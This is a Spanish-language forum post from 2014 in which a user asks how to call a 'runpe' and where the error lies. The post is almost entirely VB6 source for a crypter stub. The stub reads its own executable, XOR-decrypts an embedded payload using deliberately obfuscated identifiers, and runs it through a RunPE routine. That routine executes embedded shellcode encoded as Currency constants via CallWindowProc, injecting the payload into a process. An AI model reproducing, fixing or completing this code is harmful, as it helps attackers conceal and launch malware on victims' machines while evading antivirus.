Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - mirkosenior

#1
Dudas Generales / ayuda con llamar runpe
6 Junio 2014, 12:06 PM
hola a todos

¿Cómo puedo llamar a este runpe?

¿Alguien puede decirme dónde está el error?

Sub Main()

Dim AAAA As String

AAAA = App.Path & "\" & App.EXEName & ".exe"

Dim BBBB As String

Open AAAA For Binary As #1

BBBB = Space(LOF(1))

Get #1, , BBBB

Close #1

Dim sData() As String

sData() = Split(BBBB, "[Theref]")

sData(1) = ¥¶V«baDJØǬpRÆRQSgfâdãqG(sData(1), sData(2))

Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode))

End Sub

'RC4

Function ¥¶V«baDJØǬpRÆRQSgfâdãqG(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh As String, b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc As String) As String
Dim DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() As Byte
Dim WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() As Byte
Dim ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ As Long
Dim úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® As Long
Dim YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ As Long
Dim ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã As Long
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() = StrConv(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh, vbFromUnicode)
DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() = StrConv(b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc, vbFromUnicode)
YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ = UBound(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E)
ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã = UBound(DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj)
Do Until ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ > YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) = WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) Xor DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj(úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY®)
úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® + 1
If úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® > ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã Then úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = 0
ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ = ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ + 1
Loop
Erase DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj
¥¶V«baDJØǬpRÆRQSgfâdãqG = StrConv(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E, vbUnicode)
Erase WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E
End Function

'RUNPE

Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long
Dim Asm(121) As Currency
Asm(0) = 400681687.6885@
Asm(1) = -476253789078555.0612@
Asm(2) = 169590654935207.5756@
Asm(3) = 850533864474419.4055@
Asm(4) = 737729641913629.2885@
Asm(5) = 241583047782310.0933@
Asm(6) = 24366994722224.3183@
Asm(7) = -5591197446420.7926@
Asm(8) = 909185617598340.8258@
Asm(9) = -19175285449154.725@
Asm(10) = -74963712694652.2037@
Asm(11) = 364813893865675.1812@
Asm(12) = 417268265771289.998@
Asm(13) = -4467533218940.2859@
Asm(14) = 341408918860883.873@
Asm(15) = 24329165641253.0572@
Asm(16) = -704495800380865.7131@
Asm(17) = 374040769202653.0293@
Asm(18) = 132891045878384.5141@
Asm(19) = 330853606455412.8782@
Asm(20) = -18546831736735.2555@
Asm(21) = 319791640719971.9498@
Asm(22) = 908565053235531.3645@
Asm(23) = 204495311115001.8554@
Asm(24) = -854751321242618.2143@
Asm(25) = -74261121419612.3536@
Asm(26) = -853017920184789.9651@
Asm(27) = 853018044985278.6574@
Asm(28) = 11660982868296.5087@
Asm(29) = -644057630032745.1903@
Asm(30) = 389428549114434.7534@
Asm(31) = -76145685875174.3891@
Asm(32) = -74907416031185.4908@
Asm(33) = 494446016607881.1334@
Asm(34) = 373919167982197.785@
Asm(35) = -702326214173594.214@
Asm(36) = 852984839970549.146@
Asm(37) = 878491366656617.7029@
Asm(38) = 11660149244069.3242@
Asm(39) = -644057520081529.9839@
Asm(40) = 852992269963661.735@
Asm(41) = 118191623639287.4757@
Asm(42) = -61508987237432.1588@
Asm(43) = 683482598548397.6903@
Asm(44) = -602576477534616.4219@
Asm(45) = 312616265869225.0362@
Asm(46) = 823209967166017.4093@
Asm(47) = 242250886584983.6374@
Asm(48) = 855453146203670.4029@
Asm(49) = -79066168407783.6283@
Asm(50) = -566073494675362.3812@
Asm(51) = 707480649289074.6628@
Asm(52) = -637454398289603.5604@
Asm(53) = 244386299675628.5445@
Asm(54) = -815078417416403.5827@
Asm(55) = -18879051943875.1995@
Asm(56) = -822123707815930.6686@
Asm(57) = -18434021046527.2954@
Asm(58) = 912451606937402.8942@
Asm(59) = -644057520081529.9756@
Asm(60) = 736754098641473.959@
Asm(61) = 417322719301766.6436@
Asm(62) = 907260734372726.4513@
Asm(63) = 853017967675867.3294@
Asm(64) = 11660982865150.7807@
Asm(65) = -854635987033189.5019@
Asm(66) = 417315068676156.9237@
Asm(67) = -704495800377680.6639@
Asm(68) = 244384539136657.2125@
Asm(69) = -815078417416403.5827@
Asm(70) = 364126617392252.4421@
Asm(71) = 853022663170544.6404@
Asm(72) = -855129000041499.1355@
Asm(73) = 853017946071693.9733@
Asm(74) = 244396803451753.601@
Asm(75) = -535694978088672.9971@
Asm(76) = 853017945341749.0318@
Asm(77) = 850597150951837.7055@
Asm(78) = -693956410164477.1442@
Asm(79) = 392299672072137.6649@
Asm(80) = -75273081301284.3259@
Asm(81) = 233670410612668.8112@
Asm(82) = 232135816315923.5976@
Asm(83) = 282468056240967.6881@
Asm(84) = -701595207746232.5423@
Asm(85) = 173478023424630.523@
Asm(86) = -838890426140287.6832@
Asm(87) = 137505075359453.7978@
Asm(88) = 238303243668856.6869@
Asm(89) = 15754679864024.2693@
Asm(90) = 137137957478099.5152@
Asm(91) = 223974408162476.2226@
Asm(92) = -853018149249239.2854@
Asm(93) = 609147958724062.3211@
Asm(94) = 187716700156924.5176@
Asm(95) = 29051557366465.6234@
Asm(96) = 180486733836584.4849@
Asm(97) = -853018043593043.5209@
Asm(98) = 230703534374533.4347@
Asm(99) = 138151919766295.2044@
Asm(100) = -863941699156868.1112@
Asm(101) = 382501322004887.7562@
Asm(102) = 217671250279223.4602@
Asm(103) = -858396642110759.3865@
Asm(104) = 382501330594822.3482@
Asm(105) = 217671250279223.4602@
Asm(106) = -860029196975681.1913@
Asm(107) = 22128918341666.201@
Asm(108) = 129708668231386.2504@
Asm(109) = 138421474714790.2981@
Asm(110) = 273938087394568.7415@
Asm(111) = -703427576466491.6105@
Asm(112) = 368089803424522.0018@
Asm(113) = 273936330801683.6989@
Asm(114) = -703427576466491.6105@
Asm(115) = 382501322232107.5439@
Asm(116) = 224650062758754.033@
Asm(117) = -802975918546864.1941@
Asm(118) = 261111522452255.6862@
Asm(119) = 35367660677206.1368@
Asm(120) = 848492795353964.3185@
Asm(121) = 5.0164@

'Put Here the shellcode
eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0)
End Function